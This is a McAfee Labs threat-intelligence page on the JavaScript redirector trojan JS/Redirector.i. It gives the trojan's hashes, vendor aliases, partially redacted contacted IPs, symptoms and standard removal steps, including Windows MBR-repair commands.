McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams
Business Home McAfee Labs Threat Intelligence

JS/Redirector.i

This page shows details and results of our analysis on the malware JS/Redirector.i

Threat Detail

Malware Type: Trojan

Malware Sub-type: Script

Discovery Date: 2010-02-28

Next Steps:

Overview

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

File Information:

  • MD5  - 4A398C912289F71FD193EEC389DD2C04
  • SHA  - 905ECDDD6C621E99DE46BFACC5DB56B3ACFB6314

Aliases

  • Avast          - JS:Illredir-S
  • GData         - JS:Illredir-S
  • Kaspersky   - Trojan-Downloader.JS.Pegel.l
  • NOD32       - JS/TrojanDownloader.Agent.NSF


Minimum DAT

5906 (2010-02-28)

Updated DAT

5920 (2010-03-14)

 Minimum Engine

5.3.00

File Length

Varies

 Description Added

2010-02-28

Description Modified

2010-03-09

Malware Proliferation

Characteristics

JS/Redirector.i is a JavaScript Trojan which is usually injected into HTML page. It would be also available in malicious web sites which would redirect users to different sites than the expected one. The hackers can also send script oriented HTML-based E-mail messages.

These java script Trojans can hijack the user's browser and redirect them to any malicious web sites which would download malwares and executes them.

When executed, the trojan JS/Redirector.i connects to the following malicious web sites:

  • 91.121.[Removed].139
  • 91.204.[Removed].79

Symptoms

  • Redirection of websites.
  • Unexpected network connections to the above mentioned IP address.

Method of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, news group postings, e-mail, etc.

Removal

All Users:

Please use the following instructions for all supported versions of Windows to remove threats and other potential risks:

1.Disable System Restore .

2.Update to current engine and DAT files for detection and removal.

3.Run a complete system scan.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

1. Please go to the Microsoft Recovery Console and restore a clean MBR.

On windows XP:

Insert the Windows XP CD into the CD-ROM drive and restart the computer.
When the "Welcome to Setup" screen appears, press R to start the Recovery Console.
Select the Windows installation that is compromised and provide the administrator password
Issue 'fixmbr' command to restore the Master Boot Record
Follow onscreen instructions
Reset and remove the CD from CD-ROM drive.


On Windows Vista and 7:

Insert the Windows CD into the CD-ROM drive and restart the computer.
Click on "Repair Your Computer"
When the System Recovery Options dialog comes up, choose the Command Prompt.
Issue 'bootrec /fixmbr' command to restore the Master Boot Record
Follow onscreen instructions
Reset and remove the CD from CD-ROM drive.

Variants

United States - English